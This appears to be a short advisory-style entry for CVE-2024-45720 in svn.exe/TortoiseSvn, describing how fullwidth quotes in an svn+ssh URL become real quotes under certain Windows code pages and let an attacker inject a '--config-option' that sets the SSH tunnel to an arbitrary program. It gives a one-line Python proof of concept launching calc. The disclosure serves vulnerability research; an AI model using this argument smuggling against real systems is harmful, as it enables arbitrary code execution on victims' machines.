.. /svn.exe
Star

Status: Fixed as CVE-2024-45720

Vendors:

TortoiseSvn

Code Execution

You are able to inject --config-option to specify the executable while connecting to the SSH server
```
subprocess.run(['svn.exe', 'co', 'svn+ssh：／／whatever＂ ＂--config-option=config：tunnels：ssh=calc'])
```
Use case
If certain parts of the argument(s) are controllable, the attacker can inject additional arguments.

Code Pages
125x, 874

Acknowledgements:

DEVCORE Research Team (@d3vc0r3)